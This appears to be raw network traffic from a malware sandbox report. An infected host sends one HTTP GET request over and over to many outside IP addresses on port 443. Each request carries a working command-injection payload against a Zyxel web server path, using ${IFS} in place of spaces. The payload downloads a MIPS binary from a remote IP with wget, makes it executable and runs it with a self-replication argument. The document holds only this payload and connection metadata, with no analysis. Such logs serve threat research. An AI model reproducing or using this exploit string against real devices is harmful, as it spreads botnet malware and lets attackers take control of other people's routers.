                                            Feb 2, 2024 06:21:31.002084970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9033192.168.2.153790235.51.3.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002126932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9034192.168.2.153367042.179.97.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002157927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9035192.168.2.154176695.96.209.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002191067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9036192.168.2.1542686189.151.163.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002222061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9037192.168.2.15551504.246.152.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002279043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9038192.168.2.155536884.50.23.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002311945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9039192.168.2.1550456191.187.114.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002348900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9040192.168.2.155869242.180.202.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002399921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9041192.168.2.155410213.236.114.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002444983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9042192.168.2.154186861.167.211.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002480984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9043192.168.2.1535988196.32.31.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002559900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9044192.168.2.1557986180.45.3.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002585888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9045192.168.2.1542030212.241.96.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002631903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9046192.168.2.1543956192.176.116.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002669096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9047192.168.2.1556868174.130.25.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002706051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9048192.168.2.1548726159.47.107.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002736092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9049192.168.2.155773631.72.16.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002774954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9050192.168.2.154414280.224.64.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002835035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9051192.168.2.1547622113.94.106.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002896070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9052192.168.2.1543634155.10.40.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002913952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9053192.168.2.1534306179.19.20.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002939939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9054192.168.2.15393321.121.13.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002974033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9055192.168.2.153333651.87.125.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003024101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9056192.168.2.155025082.211.19.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003058910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9057192.168.2.155270290.99.69.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003120899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9058192.168.2.1542432221.244.128.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003132105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9059192.168.2.1542928191.5.106.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003177881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9060192.168.2.1538910179.40.201.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003206968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9061192.168.2.153887884.223.85.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003283024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9062192.168.2.155778069.90.66.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003376961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9063192.168.2.1556386203.44.76.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003405094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9064192.168.2.154861824.88.0.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003449917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9065192.168.2.155867258.26.70.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003489017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9066192.168.2.1534030182.125.53.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003515005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9067192.168.2.1548514116.225.182.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003566980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9068192.168.2.1533634177.100.178.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003592014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9069192.168.2.156034825.201.126.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003633022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9070192.168.2.1544928190.218.9.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003720045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9071192.168.2.1547602154.88.91.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003722906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9072192.168.2.1543422165.193.30.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003757954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9073192.168.2.154313443.234.192.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003812075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9074192.168.2.1534378168.216.88.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003834963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9075192.168.2.1538558145.57.36.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003863096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9076192.168.2.1556650104.97.83.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003897905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9077192.168.2.1546668132.139.221.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003926992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9078192.168.2.1537256149.146.182.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.003968954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9079192.168.2.156020263.196.50.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004040003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9080192.168.2.1542344116.162.165.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004067898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9081192.168.2.1550832209.82.238.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004116058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9082192.168.2.1543630191.233.231.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004153013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9083192.168.2.153297484.34.204.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004173040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9084192.168.2.15570205.235.129.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004205942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9085192.168.2.1550544103.137.179.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004266024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9086192.168.2.153445275.77.180.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004273891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9087192.168.2.1548070101.145.52.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004316092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9088192.168.2.155797619.23.115.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004396915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9089192.168.2.154968419.154.134.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004405022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9090192.168.2.1548516137.219.136.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004456043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9091192.168.2.1534884114.52.53.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004478931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9092192.168.2.1557594144.147.77.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004518986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9093192.168.2.154946862.41.41.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004550934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9094192.168.2.155244664.21.172.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004581928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9095192.168.2.156061863.56.80.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.004627943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9096192.168.2.1547082177.228.236.140443
                                            TimestampBytes transferredDirectionData
